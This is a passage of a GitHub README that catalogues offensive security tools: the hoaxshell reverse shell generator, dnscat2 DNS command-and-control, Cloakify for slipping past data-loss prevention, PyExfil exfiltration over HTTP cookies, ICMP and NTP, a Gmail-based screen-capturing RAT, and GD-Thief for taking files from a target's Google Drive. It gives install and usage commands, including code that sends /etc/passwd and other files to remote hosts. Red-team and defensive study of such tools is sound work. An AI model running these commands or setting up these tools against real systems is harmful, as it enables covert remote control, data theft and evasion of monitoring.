0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/t3l3machus/hoaxshell cd ./hoaxshell sudo pip3 install -r requirements.txt chmod +x hoaxshell.py"><pre>git clone https://github.com/t3l3machus/hoaxshell <span class="pl-c1">cd</span> ./hoaxshell sudo pip3 install -r requirements.txt chmod +x hoaxshell.py</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Payload that utilizes Invoke-Expression (default) sudo python3 hoaxshell.py -s <your_ip> # Payload that writes and executes commands from a file sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1" # Encrypted shell session with a trusted certificate sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>"><pre><span class="pl-c"><span class="pl-c">#</span> Payload that utilizes Invoke-Expression (default)</span> sudo python3 hoaxshell.py -s <span class="pl-k"><</span>your_ip<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> Payload that writes and executes commands from a file</span> sudo python3 hoaxshell.py -s <span class="pl-k"><</span>your_ip<span class="pl-k">></span> -x <span class="pl-s"><span class="pl-pds">"</span>C:\Users<span class="pl-cce">\\\$</span>env:USERNAME\.local\hack.ps1<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Encrypted shell session with a trusted certificate</span> sudo python3 hoaxshell.py -s <span 
class="pl-k"><</span>your.domain.com<span class="pl-k">></span> -t -c <span class="pl-k"><</span>/path/to/cert.pem<span class="pl-k">></span> -k <span class="pl-k"><</span>path/to/key.pem<span class="pl-k">></span></pre></div> <p dir="auto">Full usage documentation <a href="https://github.com/t3l3machus/hoaxshell#usage">here</a>.</p> <p dir="auto"><a href="https://www.youtube.com/watch?v=SEufgD5UxdU" rel="nofollow">Usage Demo - YouTube</a></p> <p dir="auto"><a href="https://github.com/t3l3machus/hoaxshell#av-bypass-pocs">Hoaxshell vs AV</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png"><img src="https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/t3l3machus/hoaxshell">https://github.com/t3l3machus/hoaxshell</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Exfiltration</h1><a id="user-content-exfiltration" class="anchor" aria-label="Permalink: Exfiltration" href="#exfiltration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" 
dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/iagox86/dnscat2">Dnscat2</a></h3><a id="user-content-dnscat2" class="anchor" aria-label="Permalink: 🔙Dnscat2" href="#dnscat2"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).</p> <p dir="auto">The tool is designed to be stealthy and difficult to detect, as it tunnels data inside ordinary-looking DNS queries and responses.</p> <p dir="auto"><strong>Install: (Compile - Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ gem install bundler bundle install"><pre>git clone https://github.com/iagox86/dnscat2.git <span class="pl-c1">cd</span> dnscat2/server/ gem install bundler bundle install</pre></div> <p dir="auto"><strong>Install: (Compile - Client)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make"><pre>git clone https://github.com/iagox86/dnscat2.git <span class="pl-c1">cd</span> dnscat2/client/ make</pre></div> 
<p dir="auto">Full installation information can be found in the <a href="https://github.com/iagox86/dnscat2#compiling">Installation Section</a>.</p> <p dir="auto"><strong>Usage: (Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Establish the server ruby ./dnscat2.rb DOMAIN.COM"><pre><span class="pl-c"><span class="pl-c">#</span> Establish the server</span> ruby ./dnscat2.rb DOMAIN.COM</pre></div> <p dir="auto"><strong>Usage: (Client)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Establish the client with authoritative domain ./dnscat2 DOMAIN.COM # Establish the client without authoritative domain ./dnscat2 --dns host=0.0.0.0,port=0000 # Ping the server from the client ./dnscat --ping DOMAIN.COM # Ping the server from the client, with custom dns resolver ip ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping"><pre><span class="pl-c"><span class="pl-c">#</span> Establish the client with authoritative domain</span> ./dnscat2 DOMAIN.COM <span class="pl-c"><span class="pl-c">#</span> Establish the client without authoritative domain</span> ./dnscat2 --dns host=0.0.0.0,port=0000 <span class="pl-c"><span class="pl-c">#</span> Ping the server from the client</span> ./dnscat --ping DOMAIN.COM <span class="pl-c"><span class="pl-c">#</span> Ping the server from the client, with custom dns resolver ip</span> ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping</pre></div> <p dir="auto"><strong>Usage: (Tunnels)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# (After establishing the client) You can open a new tunnelled port listen [lhost:]lport rhost:rport # Forward ssh connections through the dnscat2 client to an internal device listen 127.0.0.1:2222 
10.10.10.10:22"><pre><span class="pl-c"><span class="pl-c">#</span> (After establishing the client) You can open a new tunnelled port</span> listen [lhost:]lport rhost:rport <span class="pl-c"><span class="pl-c">#</span> Forward ssh connections through the dnscat2 client to an internal device</span> listen 127.0.0.1:2222 10.10.10.10:22</pre></div> <p dir="auto">Full usage information can be found in the <a href="https://github.com/iagox86/dnscat2#usage">Usage Section</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png"><img src="https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/TryCatchHCF/Cloakify">Cloakify</a></h3><a id="user-content-cloakify" class="anchor" aria-label="Permalink: 🔙Cloakify" href="#cloakify"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. 
Cloakify reduces this risk by transforming the data.</p> <p dir="auto">Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.</p> <p dir="auto"><strong>Note:</strong> You can make your own ciphers, see <a href="https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers">here</a> for more info.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/TryCatchHCF/Cloakify"><pre>git clone https://github.com/TryCatchHCF/Cloakify</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Cloakify some text python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked # De-Cloakify the text python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph"><pre><span class="pl-c"><span class="pl-c">#</span> Cloakify some text</span> python3 cloakify.py TEXT.txt ciphers/desserts.ciph <span class="pl-k">></span> TEXT.cloaked <span class="pl-c"><span class="pl-c">#</span> De-Cloakify the text</span> python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png"><img src="https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png"><img 
src="https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ytisf/PyExfil">PyExfil</a></h3><a id="user-content-pyexfil" class="anchor" aria-label="Permalink: 🔙PyExfil" href="#pyexfil"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios."</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install"><pre>git clone https://www.github.com/ytisf/PyExfil<span class="pl-k">;</span><span class="pl-c1">cd</span> PyExfil<span class="pl-k">;</span>pip install -r requirements.txt<span class="pl-k">;</span>pip install py2exe<span class="pl-k">;</span>pip setup.py install</pre></div> <p dir="auto"><strong>Usage:</strong> (Full Usage <a 
href="https://github.com/ytisf/PyExfil/blob/master/USAGE.md">here</a>)</p> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">HTTP Cookies</h4><a id="user-content-http-cookies" class="anchor" aria-label="Permalink: HTTP Cookies" href="#http-cookies"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen # For Client (exfil) send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL) # For Server (collecting) listen(local_addr='127.0.0.1', local_port=80)"><pre><span class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-v">HTTP_Cookies</span>.<span class="pl-s1">http_exfiltration</span> <span class="pl-k">import</span> <span class="pl-s1">send_file</span>, <span class="pl-s1">listen</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-en">send_file</span>(<span class="pl-s1">addr</span><span class="pl-c1">=</span><span class="pl-s">'http://www.morirt.com'</span>, <span class="pl-s1">file_path</span><span class="pl-c1">=</span><span class="pl-c1">FILE_TO_EXFIL</span>) <span class="pl-c"># For Server (collecting)</span> <span 
class="pl-en">listen</span>(<span class="pl-s1">local_addr</span><span class="pl-c1">=</span><span class="pl-s">'127.0.0.1'</span>, <span class="pl-s1">local_port</span><span class="pl-c1">=</span><span class="pl-c1">80</span>)</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">ICMP Echo 8</h4><a id="user-content-icmp-echo-8" class="anchor" aria-label="Permalink: ICMP Echo 8" href="#icmp-echo-8"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener # For Client (exfil) ip_addr = "127.0.0.1" send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1) # For Server (collecting) init_listener(ip_addr, saving_location="/tmp/")"><pre><span class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-c1">ICMP</span>.<span class="pl-s1">icmp_exfiltration</span> <span class="pl-k">import</span> <span class="pl-s1">send_file</span>, <span class="pl-s1">init_listener</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-s1">ip_addr</span> <span class="pl-c1">=</span> <span class="pl-s">"127.0.0.1"</span> <span 
class="pl-en">send_file</span>(<span class="pl-s1">ip_addr</span>, <span class="pl-s1">src_ip_addr</span><span class="pl-c1">=</span><span class="pl-s">"127.0.0.1"</span>, <span class="pl-s1">file_path</span><span class="pl-c1">=</span><span class="pl-s">""</span>, <span class="pl-s1">max_packetsize</span><span class="pl-c1">=</span><span class="pl-c1">512</span>, <span class="pl-c1">SLEEP</span><span class="pl-c1">=</span><span class="pl-c1">0.1</span>) <span class="pl-c"># For Server (collecting)</span> <span class="pl-en">init_listener</span>(<span class="pl-s1">ip_addr</span>, <span class="pl-s1">saving_location</span><span class="pl-c1">=</span><span class="pl-s">"/tmp/"</span>)</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">NTP Request</h4><a id="user-content-ntp-request" class="anchor" aria-label="Permalink: NTP Request" href="#ntp-request"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT # For Client (exfil) ip_addr = "127.0.0.1" exfiltrate("/etc/passwd", ip_addr, time_delay=0.1) # For Server (collecting) ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT)"><pre><span 
class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-c1">NTP</span>.<span class="pl-s1">ntp_exfil</span> <span class="pl-k">import</span> <span class="pl-s1">exfiltrate</span>, <span class="pl-s1">ntp_listen</span>, <span class="pl-c1">NTP_UDP_PORT</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-s1">ip_addr</span> <span class="pl-c1">=</span> <span class="pl-s">"127.0.0.1"</span> <span class="pl-en">exfiltrate</span>(<span class="pl-s">"/etc/passwd"</span>, <span class="pl-s1">ip_addr</span>, <span class="pl-s1">time_delay</span><span class="pl-c1">=</span><span class="pl-c1">0.1</span>) <span class="pl-c"># For Server (collecting)</span> <span class="pl-en">ntp_listener</span>(<span class="pl-s1">ip</span><span class="pl-c1">=</span><span class="pl-s">"0.0.0.0"</span>, <span class="pl-s1">port</span><span class="pl-c1">=</span><span class="pl-c1">NTP_UDP_PORT</span>)</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png"><img src="https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Viralmaniar/Powershell-RAT">Powershell RAT</a></h3><a id="user-content-powershell-rat" class="anchor" aria-label="Permalink: 🔙Powershell RAT" href="#powershell-rat"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Viralmaniar/Powershell-RAT"><pre>git clone https://github.com/Viralmaniar/Powershell-RAT</pre></div> <p dir="auto"><strong>Usage:</strong> (Full Usage <a href="https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md">here</a>)</p> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">Setup</h4><a id="user-content-setup" class="anchor" aria-label="Permalink: Setup" href="#setup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <ul dir="auto"> <li>Throwaway Gmail address</li> <li>Enable "Allow less secure apps" by going to <a href="https://myaccount.google.com/lesssecureapps" 
rel="nofollow">https://myaccount.google.com/lesssecureapps</a></li> <li>Modify the <code>$username</code> & <code>$password</code> variables for your account in the Mail.ps1 Powershell file</li> <li>Modify <code>$msg.From</code> & <code>$msg.To.Add</code> with throwaway gmail address</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png"><img src="https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/antman1p/GD-Thief">GD-Thief</a></h3><a id="user-content-gd-thief" class="anchor" aria-label="Permalink: 🔙GD-Thief" href="#gd-thief"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.</p> <p dir="auto">This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
data-snippet-clipboard-copy-content="git clone https://github.com/antman1p/GD-Thief.git cd GD-Thief pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib"><pre>git clone https://github.com/antman1p/GD-Thief.git <span class="pl-c1">cd</span> GD-Thief pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib</pre></div> <p dir="auto">then...</p> <ol dir="auto"> <li>Create a new Google Cloud Platform (GCP) project</li> <li>Enable a Google Workspace API</li> <li>Configure OAuth Consent screen</li> <li>Create a credential</li> <li>Add the victim's Google account to the Application's Test Users</li> </ol> <p dir="auto">For detailed setup instructions see the <a href="https://github.com/antman1p/GD-Thief#how-to">How To Guide</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="usage: python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]} [-t <THREAD COUNT>] help: This Module will connect to Google's API using an access token and exfiltrate files from a target's Google Drive. It will output exfiltrated files to the ./loot directory arguments: -m [{dlAll, dlDict}], --mode [{dlAll, dlDict}] The mode of file download Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come) optional arguments: -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH> Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict" You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt" -t <THREAD COUNT>, --threads <THREAD COUNT> Number of threads. 
(Too many could exceeed Google's rate limit threshold) -h, --help show this help message and exit"><pre>usage: python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span>]} [-t <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span>] help: This Module will connect to Google<span class="pl-s"><span class="pl-pds">'</span>s API using an access token and exfiltrate files</span> <span class="pl-s">from a target<span class="pl-pds">'</span></span>s Google Drive. It will output exfiltrated files to the ./loot directory arguments: -m [{dlAll, dlDict}], --mode [{dlAll, dlDict}] The mode of file download Can be <span class="pl-s"><span class="pl-pds">"</span>dlAll<span class="pl-pds">"</span></span>, <span class="pl-s"><span class="pl-pds">"</span>dlDict [-d <DICTIONARY FILE PATH>]<span class="pl-pds">"</span></span>, or... (More options to come) optional arguments: <span class="pl-k">-d</span> <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span>, --dict <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span> Path to the dictionary file. Mandatory with download mode<span class="pl-s"><span class="pl-pds">"</span>-m, --mode dlDict<span class="pl-pds">"</span></span> You can use the provided dictionary, per example: <span class="pl-s"><span class="pl-pds">"</span>-d ./dictionaries/secrets-keywords.txt<span class="pl-pds">"</span></span> <span class="pl-k">-t</span> <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span>, --threads <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span> Number of threads. 
